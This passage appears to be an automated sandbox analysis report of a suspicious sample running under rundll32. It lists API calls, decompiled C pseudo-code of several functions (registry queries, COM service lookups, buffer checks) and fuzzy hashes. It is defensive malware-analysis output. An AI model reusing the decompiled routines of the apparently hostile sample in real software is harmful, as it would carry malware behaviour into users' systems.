                                                            • Part of subcall function 00E57206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E567B6,004F0053,00000000,?), ref: 00E57239
                                                            • Part of subcall function 00E57206: memset.NTDLL ref: 00E5724D
                                                          • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00E567E5
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00E56801
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E56812
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 830012212-0
                                                          • Opcode ID: e46efe3e1a5f184dac5350a774e349c669c1a9bf86822a08aae2d86e40e81c89
                                                          • Instruction ID: 3287cec4be1cf3c9d1df852c5e5c8f255a1cd2c0fe88cd8f82b397eb467fb3a0
                                                          • Opcode Fuzzy Hash: e46efe3e1a5f184dac5350a774e349c669c1a9bf86822a08aae2d86e40e81c89
                                                          • Instruction Fuzzy Hash: E3115E76500209BFDB11DBD5DC85FAEB7FCAB04306F145865FA01F7062EB709A089B21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055783D0, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                          • RegOpenKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783EF
                                                          • lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateOpenlstrlen
                                                          • String ID:
                                                          • API String ID: 2865187142-0
                                                          • Opcode ID: 3f35b04b0b47770387ab8c938586effb4e38324f65b58ed39a32a41c9f8a1659
                                                          • Instruction ID: d4e20f00d5b13afa740d77d7f209469b0ddcca98b08409680200f5c5bbdc3f5a
                                                          • Opcode Fuzzy Hash: 3f35b04b0b47770387ab8c938586effb4e38324f65b58ed39a32a41c9f8a1659
                                                          • Instruction Fuzzy Hash: A1F06D7210420CFFE7119F95EC89EAA7B7DFB4A7A4F10800AF90285140D6B09684C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558BCA0, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(000002DC,05573638), ref: 0558BCAA
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 0558834C
                                                            • Part of subcall function 05588323: RtlDeleteCriticalSection.NTDLL(0559C2E0), ref: 0558837F
                                                            • Part of subcall function 05588323: RtlDeleteCriticalSection.NTDLL(0559C300), ref: 05588386
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883B5
                                                            • Part of subcall function 05588323: ReleaseMutex.KERNEL32(000003F4,00000000,?,?,?,0558BCB5), ref: 055883C6
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883D2
                                                            • Part of subcall function 05588323: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0558BCB5), ref: 055883DE
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883EA
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 055883F0
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 05588404
                                                            • Part of subcall function 05588323: HeapFree.KERNEL32(00000000,00000000,?,?,0558BCB5), ref: 05588427
                                                            • Part of subcall function 05588323: RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05588460
                                                          • CloseHandle.KERNEL32(000002DC), ref: 0558BCBF
                                                          • HeapDestroy.KERNELBASE(055C0000), ref: 0558BCCF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                          • String ID:
                                                          • API String ID: 1636361345-0
                                                          • Opcode ID: 7a031478b50717755fda77800fc0c00c8a1a18d32bbed50a5e2c6b42dec69f6e
                                                          • Instruction ID: c09a5afc495af941b811fd5f9c7e6d9df10634fe908cf9d4839a5c17fabae2db
                                                          • Opcode Fuzzy Hash: 7a031478b50717755fda77800fc0c00c8a1a18d32bbed50a5e2c6b42dec69f6e
                                                          • Instruction Fuzzy Hash: D5E062747252029BDB106F75FD8EA363BACBB1455138E4416B403E3150EF2CE408BA24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53686, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E00E53686(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xe5a2d4; // 0x435d5a8
				_t4 = _t49 + 0xe5b448; // 0x51b89f0
				_t5 = _t49 + 0xe5b438; // 0x9ba05972
				_t51 =  *0xe5a140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xe5a2d4; // 0x435d5a8
						_t30 = _t56 + 0xe5b428; // 0x51b89d0
						_t31 = _t56 + 0xe5b458; // 0x4c96be40
						_t58 =  *0xe5a114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0xe5a2d4; // 0x435d5a8
											_t23 = _t76 + 0xe5b428; // 0x51b89d0
											_t24 = _t76 + 0xe5b458; // 0x4c96be40
											_t105 =  *0xe5a114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0xe5a2d4; // 0x435d5a8
													_t67 = _v28;
													_t40 = _t99 + 0xe5b418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                                                          0x00e53691
                                                          0x00e53693
                                                          0x00e5369a
                                                          0x00e5369b
                                                          0x00e5369c
                                                          0x00e5369d
                                                          0x00e536a3
                                                          0x00e536a8
                                                          0x00e536b2
                                                          0x00e536b9
                                                          0x00e536bf
                                                          0x00e536c3
                                                          0x00e536c9
                                                          0x00e536d1
                                                          0x00e536d2
                                                          0x00e536d7
                                                          0x00e536d8
                                                          0x00e536da
                                                          0x00e536dd
                                                          0x00e536de
                                                          0x00e536df
                                                          0x00e536e5
                                                          0x00e5377a
                                                          0x00e5377f
                                                          0x00e53786
                                                          0x00e53790
                                                          0x00e53796
                                                          0x00e53798
                                                          0x00e5379e
                                                          0x00000000
                                                          0x00e536eb
                                                          0x00e536eb
                                                          0x00e536f2
                                                          0x00e536fb
                                                          0x00e536ff
                                                          0x00e53705
                                                          0x00e53708
                                                          0x00e5376f
                                                          0x00000000
                                                          0x00e5370a
                                                          0x00e5370a
                                                          0x00e537a1
                                                          0x00e537a3
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53710
                                                          0x00e53710
                                                          0x00e53710
                                                          0x00e53717
                                                          0x00e5371d
                                                          0x00e53722
                                                          0x00e5372a
                                                          0x00e5372b
                                                          0x00e5372c
                                                          0x00e5372e
                                                          0x00e53732
                                                          0x00e53736
                                                          0x00000000
                                                          0x00e53738
                                                          0x00e5373c
                                                          0x00e53741
                                                          0x00e53748
                                                          0x00e53758
                                                          0x00e5375a
                                                          0x00e53760
                                                          0x00e53765
                                                          0x00e537a5
                                                          0x00e537a5
                                                          0x00e537b2
                                                          0x00e537b6
                                                          0x00e537bb
                                                          0x00e537c1
                                                          0x00e537c6
                                                          0x00e537d0
                                                          0x00e537d2
                                                          0x00e537d8
                                                          0x00e537d8
                                                          0x00e537db
                                                          0x00e537e1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53765
                                                          0x00000000
                                                          0x00e53767
                                                          0x00e53767
                                                          0x00e53768
                                                          0x00000000
                                                          0x00e5376d
                                                          0x00e5370a
                                                          0x00e53708
                                                          0x00e536ff
                                                          0x00e537e4
                                                          0x00e537e4
                                                          0x00e537ea
                                                          0x00e537ea
                                                          0x00e537f3

                                                          APIs
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,?,?,?,?,00E54DD1), ref: 00E53752
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,00E54DD1,00000000,00000000,00000000,006D0063), ref: 00E53790
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryServiceUnknown_
                                                          • String ID:
                                                          • API String ID: 2042360610-0
                                                          • Opcode ID: 87f0739bd9c154014b413e33936d7f62bdd2894f54ce4c6c4632ea357c8c64c0
                                                          • Instruction ID: 7b372d5ddb091f21586a6b361d0ac7954988319a90f7610639f531967a4830a1
                                                          • Opcode Fuzzy Hash: 87f0739bd9c154014b413e33936d7f62bdd2894f54ce4c6c4632ea357c8c64c0
                                                          • Instruction Fuzzy Hash: C4512BB5D00219AFCB00CFE8C888DAEB7B9FF48751B14499AE915FB211D731AD45CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53969, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E00E53969(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00E54C9F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xe5a2d4; // 0x435d5a8
						_t20 = _t68 + 0xe5b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00E56900(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                          0x00e5396f
                                                          0x00e53972
                                                          0x00e53982
                                                          0x00e5398b
                                                          0x00e5398f
                                                          0x00e53a5d
                                                          0x00e53a63
                                                          0x00e53a63
                                                          0x00e539a9
                                                          0x00e539ae
                                                          0x00e539b2
                                                          0x00e539b8
                                                          0x00e539bd
                                                          0x00e539c4
                                                          0x00e539d3
                                                          0x00e539d3
                                                          0x00e539d7
                                                          0x00e539d9
                                                          0x00e539e5
                                                          0x00e539f0
                                                          0x00e539fb
                                                          0x00e539ff
                                                          0x00e53a09
                                                          0x00e53a0d
                                                          0x00e53a0f
                                                          0x00e53a14
                                                          0x00e53a1b
                                                          0x00e53a2b
                                                          0x00e53a2b
                                                          0x00e53a14
                                                          0x00e53a0d
                                                          0x00e53a2d
                                                          0x00e53a32
                                                          0x00e53a37
                                                          0x00e53a37
                                                          0x00e53a3d
                                                          0x00e53a43
                                                          0x00e53a48
                                                          0x00e53a48
                                                          0x00e53a4d
                                                          0x00e53a52
                                                          0x00e53a52
                                                          0x00e53a4d
                                                          0x00e539d7
                                                          0x00e53a54
                                                          0x00e53a5a
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00E54C9F: SysAllocString.OLEAUT32(80000002), ref: 00E54CF6
                                                            • Part of subcall function 00E54C9F: SysFreeString.OLEAUT32(00000000), ref: 00E54D5B
                                                          • SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SysFreeString.OLEAUT32(00E554F6), ref: 00E53A52
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: e7154a4bb95294a7741ba3379d66e7e786a3e86a4df746beef78c42770238bf4
                                                          • Instruction ID: b2661e7a15556ed7f1ec72cb1aea21b9dd4a544f839b77191a70004548d073f1
                                                          • Opcode Fuzzy Hash: e7154a4bb95294a7741ba3379d66e7e786a3e86a4df746beef78c42770238bf4
                                                          • Instruction Fuzzy Hash: 82316672500158EFCF21DFA8C888C9BBBB9FBC97857104A58FC15AB211D331AE55CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E52879, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E52879(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E00E53C51(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00E55FBC(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00E513CC(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00E52C05(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E00E53276(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                                          0x00e52884
                                                          0x00e52887
                                                          0x00e52890
                                                          0x00e52893
                                                          0x00e52896
                                                          0x00e52899
                                                          0x00e52995
                                                          0x00e52999
                                                          0x00e528ab
                                                          0x00e528b7
                                                          0x00e528be
                                                          0x00e528c5
                                                          0x00000000
                                                          0x00000000
                                                          0x00e528cb
                                                          0x00e528d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00e528d9
                                                          0x00e528e2
                                                          0x00e528e6
                                                          0x00000000
                                                          0x00000000
                                                          0x00e528e8
                                                          0x00e528ef
                                                          0x00e528f4
                                                          0x00e528f6
                                                          0x00e528f9
                                                          0x00e5297a
                                                          0x00e52981
                                                          0x00e52983
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52985
                                                          0x00e52989
                                                          0x00e5298e
                                                          0x00e5298e
                                                          0x00000000
                                                          0x00e52989
                                                          0x00e52900
                                                          0x00e52908
                                                          0x00e52908
                                                          0x00e52911
                                                          0x00e5291f
                                                          0x00e52976
                                                          0x00e52976
                                                          0x00000000
                                                          0x00e52942
                                                          0x00e52945
                                                          0x00000000
                                                          0x00e52945
                                                          0x00e5291f
                                                          0x00e52954
                                                          0x00e52962
                                                          0x00e52967
                                                          0x00e52969
                                                          0x00e5297e
                                                          0x00000000
                                                          0x00e5297e
                                                          0x00e5296b
                                                          0x00e52971
                                                          0x00e52974
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52974

                                                          APIs
                                                          • memcpy.NTDLL(00000000,?,?,?,?,?,?,{Q,?,?), ref: 00E52900
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: {Q
                                                          • API String ID: 3510742995-1336059103
                                                          • Opcode ID: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                          • Instruction ID: 69610ce73bf3e5176494d089e84948806c34402a445846efa26fc957c23449af
                                                          • Opcode Fuzzy Hash: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                          • Instruction Fuzzy Hash: FF316371900119EFDF14DEA4C880BEDB3B8BB56319F1458ADEA49B7251D7309E488B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56566, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00E56566(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xe5a2d4; // 0x435d5a8
				_t2 = _t42 + 0xe5b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xe5a2d4; // 0x435d5a8
					_t6 = _t45 + 0xe5b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xe5a2d4; // 0x435d5a8
							_t30 = _v8;
							_t12 = _t48 + 0xe5b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                                          0x00e56572
                                                          0x00e56573
                                                          0x00e56579
                                                          0x00e56580
                                                          0x00e56582
                                                          0x00e56586
                                                          0x00e5658a
                                                          0x00e5658c
                                                          0x00e56595
                                                          0x00e5659b
                                                          0x00e565a3
                                                          0x00e565a5
                                                          0x00e565a9
                                                          0x00e565ab
                                                          0x00e565b8
                                                          0x00e565bc
                                                          0x00e565c1
                                                          0x00e565c7
                                                          0x00e565cc
                                                          0x00e565d4
                                                          0x00e565d6
                                                          0x00e565d8
                                                          0x00e565de
                                                          0x00e565de
                                                          0x00e565e1
                                                          0x00e565e7
                                                          0x00e565e7
                                                          0x00e565ea
                                                          0x00e565f0
                                                          0x00e565f0
                                                          0x00e565f7

                                                          APIs
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00E565A3
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00E565D4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interface_ProxyQueryUnknown_
                                                          • String ID:
                                                          • API String ID: 2522245112-0
                                                          • Opcode ID: 5bbd273b72d05eab78aeac444470d6cba4875e94c710da5b6f94a9c66a3c0324
                                                          • Instruction ID: 8fae05058290a050caef554c93ab87f673f02dc3b544b5e530412a586a1aa70e
                                                          • Opcode Fuzzy Hash: 5bbd273b72d05eab78aeac444470d6cba4875e94c710da5b6f94a9c66a3c0324
                                                          • Instruction Fuzzy Hash: D2214275A00619EFCB04CBA4C884D9AB7B9FF88705B148A94ED05EF325D731ED45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055746DA, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000), ref: 0557470A
                                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000), ref: 05574751
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                          • String ID:
                                                          • API String ID: 552344955-0
                                                          • Opcode ID: 020e7ed5d350b3d7935bff8e0da37da433909c19434fb5fcaf260912f58d15b9
                                                          • Instruction ID: 1f65169063ca22d88f5b5b117c2f99b13f236f6f3ff8f0a52e3fbe985bc34e98
                                                          • Opcode Fuzzy Hash: 020e7ed5d350b3d7935bff8e0da37da433909c19434fb5fcaf260912f58d15b9
                                                          • Instruction Fuzzy Hash: E211A975A1020DFBCB11EFA9E884BAEBBB9FFD1355F204099E40197200DB759A05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5299C, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00E529C4
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 00E52A11
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
